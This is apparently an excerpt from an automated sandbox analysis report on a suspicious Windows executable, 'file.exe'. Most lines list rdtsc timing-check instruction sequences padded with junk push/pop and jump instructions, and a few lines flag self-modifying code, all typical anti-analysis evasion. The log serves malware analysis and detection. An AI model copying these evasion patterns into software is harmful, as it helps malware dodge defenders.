                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6AA6 second address: CE6AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA68C246E8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6AC4 second address: CE6AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 ja 00007FBA693F3714h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBA693F36C5h 0x00000013 jnc 00007FBA693F36B6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6D95 second address: CE6D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6D99 second address: CE6DA5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6DA5 second address: CE6DDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FBA68C246E2h 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FBA68C246D6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6DDD second address: CE6DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F0F second address: CE6F2F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FBA68C246E7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEF11E second address: CEF127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEF127 second address: CEF134 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA68C246D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED459 second address: CED46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jc 00007FBA693F36B6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED81D second address: CED82D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246DCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED82D second address: CED833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED833 second address: CED839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED839 second address: CED83D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED83D second address: CED858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA68C246E1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED858 second address: CED864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEDDDB second address: CEDDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEDDEA second address: CEDDEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE08A second address: CEE0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 je 00007FBA68C246E4h 0x0000000d jmp 00007FBA68C246DEh 0x00000012 push eax 0x00000013 jc 00007FBA68C246D6h 0x00000019 pop eax 0x0000001a jg 00007FBA68C246DEh 0x00000020 popad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 je 00007FBA68C246D6h 0x0000002a push edi 0x0000002b pop edi 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE0C7 second address: CEE0E5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA693F36B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBA693F36BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FBA693F36B6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF78 second address: CEEF82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FBA68C246D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF82 second address: CEEF8B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF8B second address: CEEF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF91 second address: CEEF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF9D second address: CEEFAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBA68C246D6h 0x0000000a jnp 00007FBA68C246D6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEFAE second address: CEEFB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF90FB second address: CF90FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF90FF second address: CF9111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FBA693F36B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9262 second address: CF9281 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBA68C246EAh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D042D0 second address: D042D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D042D6 second address: D042DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D042DC second address: D042E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03E87 second address: D03E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03E8B second address: D03E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0673B second address: D06741 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06741 second address: D0675D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FBA693F36BEh 0x0000000c jc 00007FBA693F36BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0BC6E second address: D0BC77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0BC77 second address: D0BC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D193FE second address: D19402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19402 second address: D19435 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 jmp 00007FBA693F36C5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 jmp 00007FBA693F36BAh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19435 second address: D1944B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FBA68C246DFh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1944B second address: D19451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B12C second address: D1B132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B132 second address: D1B138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B138 second address: D1B143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1CA2A second address: D1CA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1CA35 second address: D1CA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBA68C246D6h 0x0000000a pop edi 0x0000000b jp 00007FBA68C246EAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C8C6 second address: D1C8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C8CA second address: D1C8D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C8D0 second address: D1C8D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D249F7 second address: D24A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FBA68C246DBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24A0A second address: D24A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA693F36C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D233A4 second address: D233A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D233A8 second address: D233AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D233AE second address: D233B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23675 second address: D2367A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2367A second address: D23680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D246B2 second address: D246D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FBA693F36B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FBA693F36C5h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27EC4 second address: D27ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3494B second address: D34950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34950 second address: D34956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34956 second address: D34981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007FBA693F36B6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBA693F36C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34981 second address: D3498B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBA68C246D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3498B second address: D3498F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3498F second address: D34995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37A93 second address: D37AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jno 00007FBA693F36B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f je 00007FBA693F36C2h 0x00000015 jnl 00007FBA693F36B6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D302AF second address: D302D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBA68C246D6h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007FBA68C246E3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53950 second address: D53986 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push edi 0x00000009 jmp 00007FBA693F36C0h 0x0000000e pop edi 0x0000000f push edx 0x00000010 ja 00007FBA693F36B6h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edx 0x00000019 pushad 0x0000001a jmp 00007FBA693F36BFh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53986 second address: D5398E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53ACB second address: D53ADF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36BEh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5407A second address: D5407E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D541CB second address: D541E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA693F36C4h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54340 second address: D5435D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBA68C246E1h 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5435D second address: D5436A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5875F second address: D58764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58764 second address: D5877A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA693F36BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5877A second address: D5877F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58CFF second address: D58D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA693F36BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D10 second address: D58D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D14 second address: D58D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007FBA693F36D3h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007FBA693F36C9h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D62 second address: D58D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D66 second address: D58D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FBA693F36C2h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A679 second address: D5A67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A1CA second address: D5A1E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jne 00007FBA693F36B6h 0x0000000d jmp 00007FBA693F36C1h 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A1E9 second address: D5A208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBA68C246E9h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A208 second address: D5A223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0578 second address: 52C059C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C059C second address: 52C05A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C05A0 second address: 52C05BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C064F second address: 52C0655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0655 second address: 52C0681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA68C246E7h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0681 second address: 52C06E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FBA693F36BFh 0x00000008 pop esi 0x00000009 mov esi, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 movzx ecx, bx 0x00000013 pushfd 0x00000014 jmp 00007FBA693F36BDh 0x00000019 sub ax, 3836h 0x0000001e jmp 00007FBA693F36C1h 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FBA693F36C8h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06E1 second address: 52C06E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06E5 second address: 52C06EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C804DD second address: C804E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBA68C246DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C806FC second address: C80701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ACDB4C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ACDC3F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C4CDEB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C70B9C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ACDBA4 instructions caused by: Self-modifying code
